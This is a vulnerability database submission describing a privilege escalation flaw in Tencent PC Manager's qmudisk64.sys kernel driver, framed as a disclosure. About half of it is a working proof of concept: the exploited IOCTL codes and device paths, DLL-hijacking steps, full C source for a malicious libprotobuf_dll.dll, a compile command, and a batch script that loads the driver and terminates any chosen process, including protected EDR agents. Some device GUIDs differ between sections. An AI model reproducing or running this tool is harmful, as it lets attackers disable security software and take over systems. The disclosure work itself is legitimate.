| Título | Tencent PC Manager 18,1,30242,301 Improper Access Controls |
|---|
| Descripción | # Tencent QMUDisk Driver Privilege Escalation Vulnerability
## Executive Summary
A critical privilege escalation vulnerability exists in Tencent PC Manager's kernel driver `qmudisk64.sys`. The driver exposes **multiple dangerous IOCTL interfaces** across 4 device symlinks that allow any process with a valid RSA signature (embedded in Tencent executables) to:
1. **Terminate arbitrary processes** (including PPL-protected processes, EDR agents, system services)
2. **Unload arbitrary kernel drivers** (EDR drivers, security filters, monitoring components)
3. **Remove kernel security callbacks** (PsSetLoadImageNotifyRoutine, ObRegisterCallbacks)
4. **Bypass Windows security boundaries** completely
The RSA signature validation can be trivially bypassed through **DLL hijacking** of legitimate Tencent executables, allowing any unprivileged user to gain complete control over system security infrastructure.
**Vendor:** Tencent
**Product:** Tencent PC Manager (腾讯电脑管家)
**Affected Component:** `qmudisk64.sys` kernel driver
**Vulnerability Type:** Privilege Escalation / Arbitrary Process Termination / Driver Manipulation / Security Callback Bypass
**Attack Vector:** Local
**Privileges Required:** Low (any user can execute Tencent signed binaries)
**Impact:** Complete system compromise, EDR/AV bypass, protected process termination, kernel security infrastructure removal
---
## Vulnerability Details
### Root Cause
The driver creates multiple device symlinks accessible from user mode:
- `\\.\QMUDisk` - Main device (requires RSA signature validation)
- `\\.\ODAY_{3EEEDE5F-C832-4126-AA30-0DC8A81FA22E}` - Kill/Unload device
- `\\.\SL_{2A9C5798-6880-4D52-8A27-5C70090D96E8}` - Callback removal device
- `\\.\{C881BF08-7F3A-4227-9F7D-D18DEE8A45AE}` - Additional control device
The driver implements RSA signature validation to restrict access, but this protection can be bypassed through **DLL hijacking** of legitimate Tencent executables.
### Vulnerable IOCTLs
The driver exposes **multiple dangerous IOCTLs** across different device interfaces:
#### Device 1: `\\.\ODAY_{3EEEDE5F-C832-4126-AA30-0DC8A81FA22E}`
**IOCTL 0x2224C8 - Kill Process**
- **Function:** Terminates arbitrary process by PID via `ZwTerminateProcess`
- **Input Buffer:**
```c
struct KillRequest {
ULONGLONG target_pid; // +0x00: Target process ID
ULONGLONG reserved1; // +0x08: Unused
ULONG reserved2; // +0x10: Unused
ULONG result; // +0x14: Output status
};
```
- **Impact:** Can kill any process including PPL-protected processes, EDR agents, system services
**IOCTL 0x222018 - Unload Driver**
- **Function:** Unloads arbitrary kernel driver
- **Impact:** Can disable security drivers, EDR kernel components, antivirus filters
#### Device 2: `\\.\{C881BF08-DA7F-4a47-8462-E111F3A90100}`
**IOCTL 0x2225C0** - Memory/Process Operations
**IOCTL 0x2225C4** - Additional Control Functions
**IOCTL 0x2225C8** - System Manipulation
**IOCTL 0x2225CC** - Advanced Operations
**IOCTL 0x2225D0** - Extended Functionality
*(Full analysis of these IOCTLs available upon request)*
#### Device 3: `\\.\SL_{2A9C5798-8D9E-4B8A-96F2-6EC5A5B40195}`
**Function:** Callback removal and security feature bypass
- Removes kernel callbacks (PsSetLoadImageNotifyRoutine, ObRegisterCallbacks)
- Disables security monitoring hooks
#### Device 4: `\\.\QMUDisk` (Main Device)
**Function:** General driver control and configuration
- Requires RSA signature validation
- Primary interface for legitimate Tencent operations
**Kernel Implementation:**
```c
// Pseudo-code from IDA analysis
NTSTATUS DispatchDeviceControl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
ULONG ioctl = IoGetCurrentIrpStackLocation(Irp)->Parameters.DeviceIoControl.IoControlCode;
if (ioctl == 0x002224C8) { // Kill process IOCTL
ULONGLONG target_pid = *(ULONGLONG*)Irp->AssociatedIrp.SystemBuffer;
HANDLE hProcess;
// Open target process with PROCESS_TERMINATE
CLIENT_ID cid = { (HANDLE)target_pid, NULL };
OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, 0 };
if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_TERMINATE, &oa, &cid))) {
ZwTerminateProcess(hProcess, 0); // Kill without validation
ZwClose(hProcess);
}
}
// ...
}
```
**Critical Flaw:** No validation of:
- Caller privileges
- Target process protection level (PPL/PsProtectedProcess)
- System process restrictions (PID 4, csrss.exe, etc.)
---
## Exploitation
### Attack Vector: DLL Hijacking
Tencent ships multiple executables with embedded RSA signatures that pass driver validation:
- `QQPCRTP.exe` (32-bit, loads `libprotobuf_dll.dll`)
- `QQPCTray.exe` (64-bit, various DLL dependencies)
- Other Tencent components
**Exploitation Steps:**
1. **Driver Loading** (requires admin once):
```cmd
sc create QMUDisk type= kernel binPath= "C:\path\to\qmudisk64_ev.sys"
sc start QMUDisk
```
2. **DLL Hijacking Setup**:
- Place malicious `libprotobuf_dll.dll` next to `QQPCRTP.exe`
- DLL exports all required functions as stubs
- `DllMain` contains exploit payload
3. **Trigger Exploit**:
```cmd
set KILL_PID=1234
QQPCRTP.exe
```
4. **Exploit Flow**:
```
QQPCRTP.exe launches
→ Loads libprotobuf_dll.dll (hijacked)
→ DllMain(DLL_PROCESS_ATTACH) executes
→ Driver validates QQPCRTP.exe RSA signature ✓
→ CreateFileW("\\.\ODAY_{3EEEDE5F-...}") succeeds
→ DeviceIoControl(0x002224C8, target_pid)
→ Kernel calls ZwTerminateProcess(target_pid)
→ Target process terminated (even if protected)
```
---
## Proof of Concept
### Malicious DLL (libprotobuf_dll.dll)
```c
#include <windows.h>
#define IOCTL_KILL 0x002224C8
#define DEVICE_PATH L"\\\\.\\ODAY_{3EEEDE5F-C832-4126-AA30-0DC8A81FA22E}"
static void do_kill(void) {
char buf[32] = {0};
if (!GetEnvironmentVariableA("KILL_PID", buf, sizeof(buf))) return;
DWORD pid = (DWORD)atoi(buf);
if (pid == 0 || pid == 4) return;
HANDLE hDev = CreateFileW(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE,
0, NULL, OPEN_EXISTING, 0, NULL);
if (hDev == INVALID_HANDLE_VALUE) return;
BYTE ioctl_buf[24] = {0};
*(ULONGLONG*)&ioctl_buf[0] = (ULONGLONG)pid;
DWORD returned = 0;
DeviceIoControl(hDev, IOCTL_KILL, ioctl_buf, 24, ioctl_buf, 24,
&returned, NULL);
CloseHandle(hDev);
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
DisableThreadLibraryCalls(hinstDLL);
do_kill();
}
return TRUE;
}
```
**Compilation:**
```bash
i686-w64-mingw32-gcc -shared -o libprotobuf_dll.dll dllmain.c stubs.c exports.def -lkernel32
```
### Full Exploit Script
```cmd
@echo off
REM Tencent QMUDisk Arbitrary Process Kill PoC
REM Usage: exploit.bat <target_pid>
set TARGET_PID=%1
if "%TARGET_PID%"=="" (
echo Usage: %0 ^<target_pid^>
exit /b 1
)
echo [*] Loading QMUDisk driver...
sc create QMUDisk type= kernel binPath= "%CD%\qmudisk64_ev.sys"
sc start QMUDisk
timeout /t 2 /nobreak >nul
echo [*] Killing PID %TARGET_PID%...
set KILL_PID=%TARGET_PID%
start /wait QQPCRTP.exe
echo [*] Cleaning up...
sc stop QMUDisk
sc delete QMUDisk
echo [+] Done. Check if PID %TARGET_PID% is still alive.
```
|
|---|
| Fuente | ⚠️ https://github.com/subsubsub1231/qmukiller |
|---|
| Usuario | Anonymous User |
|---|
| Sumisión | 2026-06-05 04:44 (hace 1 mes) |
|---|
| Moderación | 2026-07-12 13:02 (1 month later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 377844 [Tencent PC Manager 18.1.30242.301 QMUDisk Driver qmudisk64.sys escalada de privilegios] |
|---|
| Puntos | 20 |
|---|